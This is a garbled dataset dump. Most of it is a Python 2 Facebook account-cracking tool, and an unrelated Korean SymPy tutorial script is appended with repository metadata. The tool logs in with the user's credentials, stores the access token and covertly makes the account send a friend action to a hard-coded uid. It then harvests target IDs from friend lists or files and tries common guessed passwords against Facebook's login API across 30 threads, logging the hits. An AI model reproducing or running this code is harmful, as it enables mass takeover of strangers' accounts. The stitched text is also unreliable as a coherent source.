\033[1;96mAuthor \033[1;93m: \033[1;92mRana Aahil
\033[1;96mInstagram \033[1;93m: \033[1;92mFlowRana
\033[1;96mFacebook \033[1;93m: \033[1;92m Aahilrana4072
\033[1;96mGithub \033[1;93m: \033[1;92mhttps://Github.com/Therana/zero
\033[1;91m======================================="""
print " \x1b[1;93m============================================================="
CorrectUsername = "rana"
CorrectPassword = "rana"
loop = 'true'
while (loop == 'true'):
username = raw_input("\033[1;96m[☆] \x1b[1;93mUsername Of Tool \x1b[1;96m>>>> ")
if (username == CorrectUsername):
password = raw_input("\033[1;96m[☆] \x1b[1;93mPassword Of Tool \x1b[1;96m>>>> ")
if (password == CorrectPassword):
print "Logged in successfully as " + username
loop = 'false'
else:
print "Wrong Password"
os.system('xdg-open https://www.Youtube.com/UCsdJQbRf0xpvwaDu1rqgJuA')
else:
print "Wrong Username"
os.system('xdg-open https://www.Youtube.com/UCsdJQbRf0xpvwaDu1rqgJuA')
def login():
os.system('clear')
try:
toket = open('login.txt','r')
menu()
except (KeyError,IOError):
os.system('clear')
print logo
print 42*"\033[1;96m="
print('\033[1;96m[☆] \x1b[1;93mLOGIN WITH FACEBOOK \x1b[1;96m[☆]' )
id = raw_input('\033[1;96m[+] \x1b[1;93mID/Email \x1b[1;91m: \x1b[1;92m')
pwd = raw_input('\033[1;96m[+] \x1b[1;93mPassword \x1b[1;91m: \x1b[1;92m')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print"\n\033[1;96m[!] \x1b[1;91mThere is no internet connection"
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig= 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail='+id+'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword='+pwd+'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {"api_key":"882a8490361da98702bf97a021ddc14d","credentials_type":"password","email":id,"format":"JSON", "generate_machine_id":"1","generate_session_cookies":"1","locale":"en_US","method":"auth.login","password":pwd,"return_ssl_resources":"0","v":"1.0"}
x=hashlib.new("md5")
x.update(sig)
a=x.hexdigest()
data.update({'sig':a})
url = "https://api.facebook.com/restserver.php"
r=requests.get(url,params=data)
z=json.loads(r.text)
unikers = open("login.txt", 'w')
unikers.write(z['access_token'])
unikers.close()
print '\n\033[1;96m[✓] \x1b[1;92mLogin Successful'
os.system('xdg-open https://www.Facebook.com/Omi6t')
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token='+z['access_token'])
menu()
except requests.exceptions.ConnectionError:
print"\n\033[1;96m[!] \x1b[1;91mThere is no internet connection"
keluar()
if 'checkpoint' in url:
print("\n\033[1;96m[!] \x1b[1;91mIt seems that your account has a checkpoint")
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
else:
print("\n\033[1;96m[!] \x1b[1;91mPassword/Email is wrong")
os.system('rm -rf login.txt')
time.sleep(1)
login()
def menu():
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
os.system('clear')
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
otw = requests.get('https://graph.facebook.com/me?access_token='+toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
except KeyError:
os.system('clear')
print"\033[1;96m[!] \033[1;91mIt seems that your account has a checkpoint"
os.system('rm -rf login.txt')
time.sleep(1)
login()
except requests.exceptions.ConnectionError:
print"\033[1;96m[!] \x1b[1;91mThere is no internet connection"
keluar()
os.system("clear")
print logo
print 42*"\033[1;96m="
print "\033[1;96m[\033[1;97m✓\033[1;96m]\033[1;93m Name \033[1;91m: \033[1;92m"+nama+"\033[1;97m "
print "\033[1;96m[\033[1;97m✓\033[1;96m]\033[1;93m ID \033[1;91m: \033[1;92m"+id+"\x1b[1;97m "
print 42*"\033[1;96m="
print "\x1b[1;96m[\x1b[1;92m1\x1b[1;96m]\x1b[1;93m Start Hacking"
print "\x1b[1;96m[\x1b[1;91m0\x1b[1;96m]\x1b[1;91m Exit "
pilih()
def pilih():
unikers = raw_input("\n\033[1;97m >>> \033[1;97m")
if unikers =="":
print "\033[1;96m[!] \x1b[1;91mFill in correctly"
pilih()
elif unikers =="1":
super()
elif unikers =="0":
jalan('Token Removed')
os.system('rm -rf login.txt')
keluar()
else:
print "\033[1;96m[!] \x1b[1;91mFill in correctly"
pilih()
def super():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 42*"\033[1;96m="
print "\x1b[1;96m[\x1b[1;92m1\x1b[1;96m]\x1b[1;93m Crack From Friend List"
print "\x1b[1;96m[\x1b[1;92m2\x1b[1;96m]\x1b[1;93m Crack From Any Public ID"
print "\x1b[1;96m[\x1b[1;92m3\x1b[1;96m]\x1b[1;93m Crack From File"
print "\x1b[1;96m[\x1b[1;91m0\x1b[1;96m]\x1b[1;91m Back"
pilih_super()
def pilih_super():
peak = raw_input("\n\033[1;97m >>> \033[1;97m")
if peak =="":
print "\033[1;96m[!] \x1b[1;91mFill in correctly"
pilih_super()
elif peak =="1":
os.system('clear')
print logo
print 42*"\033[1;96m="
jalan('\033[1;96m[✺] \033[1;93mGetting ID \033[1;97m...')
r = requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
elif peak =="2":
os.system('clear')
print logo
print 42*"\033[1;96m="
idt = raw_input("\033[1;96m[+] \033[1;93mEnter ID \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;93mName\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;96m[!] \x1b[1;91mID Not Found!"
raw_input("\n\033[1;96m[\033[1;97mBack\033[1;96m]")
super()
jalan('\033[1;96m[✺] \033[1;93mGetting IDs \033[1;97m...')
r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+toket)
z = json.loads(r.text)
for i in z['data']:
id.append(i['id'])
elif peak =="3":
os.system('clear')
print logo
print 42*"\033[1;96m="
try:
idlist = raw_input('\x1b[1;96m[+] \x1b[1;93mEnter File Path \x1b[1;91m: \x1b[1;97m')
for line in open(idlist,'r').readlines():
id.append(line.strip())
except IOError:
print '\x1b[1;96m[!] \x1b[1;91mFile Not Found'
raw_input('\n\x1b[1;96m[ \x1b[1;97mBack \x1b[1;96m]')
super()
elif peak =="0":
menu()
else:
print "\033[1;96m[!] \x1b[1;91mFill in correctly"
pilih_super()
print "\033[1;96m[+] \033[1;93mTotal IDs \033[1;91m: \033[1;97m"+str(len(id))
jalan('\033[1;96m[✺] \033[1;93mStarting \033[1;97m...')
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;96m[\033[1;97m✸\033[1;96m] \033[1;93mCracking \033[1;97m"+o),;sys.stdout.flush();time.sleep(1)
print
print('\x1b[1;96m[!] \x1b[1;93mTo Stop Process Press CTRL Then Press z')
print 42*"\033[1;96m="
def main(arg):
global cekpoint,oks
user = arg
try:
os.mkdir('out')
except OSError:
pass
try:
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
b = json.loads(a.text)
pass1 = ('786786')
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mSuccessful\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass1
oks.append(user+pass1)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCheckpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass1
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass1+"\n")
cek.close()
cekpoint.append(user+pass1)
else:
pass2 = b['first_name']+'12345'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mSuccessful\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass2
oks.append(user+pass2)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCheckpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass2
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass2+"\n")
cek.close()
cekpoint.append(user+pass2)
else:
pass3 = b['first_name'] + '123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mSuccessful\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass3
oks.append(user+pass3)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCheckpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass3
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass3+"\n")
cek.close()
cekpoint.append(user+pass3)
else:
pass4 = 'Pakistan'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass4)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mSuccessful\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass4
oks.append(user+pass4)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCheckpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass4
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass4+"\n")
cek.close()
cekpoint.append(user+pass4)
else:
pass5 = b['first_name'] + '12'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass5)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mSuccessful\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass5
oks.append(user+pass5)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCheckpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass5
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass5+"\n")
cek.close()
cekpoint.append(user+pass5)
else:
pass6 = b['first_name'] + '1234'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass6)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mSuccessful\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass6
oks.append(user+pass6)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCheckpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass6
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass6+"\n")
cek.close()
cekpoint.append(user+pass6)
else:
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
b = json.loads(a.text)
pass7 = b['first_name'] + '1122'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass7)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mSuccessful\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass7
oks.append(user+pass7)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCheckpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass7
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass7+"\n")
cek.close()
cekpoint.append(user+pass7)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print 42*"\033[1;96m="
print '\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;92mProcess Has Been Completed \033[1;97m....'
print"\033[1;96m[+] \033[1;92mTotal OK/\x1b[1;93mCP \033[1;91m: \033[1;92m"+str(len(oks))+"\033[1;97m/\033[1;93m"+str(len(cekpoint))
print("\033[1;96m[+] \033[1;92mCP File Has Been Saved \033[1;91m: \033[1;97mout/checkpoint.txt")
raw_input("\n\033[1;96m[\033[1;97mBack\033[1;96m]")
menu()
if __name__ == '__main__':
login()
| [
"noreply@github.com"
] | noreply@github.com |
ebfa26f25eb795d6535f7e5c1730227ce0696442 | a75d22f5c3c10c601a800b973544b0cc25e446f9 | /NA_1_Preliminary/chap3_1.CAS_simplify.py | 6565c22672d5e3905fcbf33e04aaad721d44eb2a | [] | no_license | jsm2371/Computation | 71cf0c811e8068f45c2eee8882a31ea9c98b9bb0 | 5d3a920132065dcf4e4993e37df539458a632c17 | refs/heads/master | 2023-02-02T23:05:13.405720 | 2020-12-12T11:20:28 | 2020-12-12T11:20:28 | 297,341,212 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 857 | py | import sympy
from sympy import I, pi, oo
sympy.init_printing()
#### 수식 단순화 ####
# sympy.simplify(expr) #단순화 -휴리스틱 접근법에 의존하고 있음.
# self.simplify()
# sympy.trigsimp(expr) #삼각함수 특화
# sympy.powsimp(expr) #멱함수 특화
# sympy.compsimp(expr) #조합 특화
# sympy.ratsimp(expr) #공통분모 특화
#### 수식 단순화 ####
print(">>> 수식 단순화 <<<")
x, y= sympy.symbols("x, y")
expr = 2 * (x**2 - x) - x * (x+1)
print(expr)
print(sympy.simplify(expr))
print(expr.simplify())
print(expr)
print("\n"+">>> 수식 단순화2 <<<")
expr = 2 * sympy.cos(x) * sympy.sin(x)
print(expr)
print(sympy.simplify(expr))
print(sympy.trigsimp(expr))
print("\n"+">>> 수식 단순화3 <<<")
expr = sympy.exp(x) * sympy.exp(y)
print(expr)
print(sympy.simplify(expr))
print(sympy.powsimp(expr))
| [
"jsm2371@hanmail.net"
] | jsm2371@hanmail.net |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.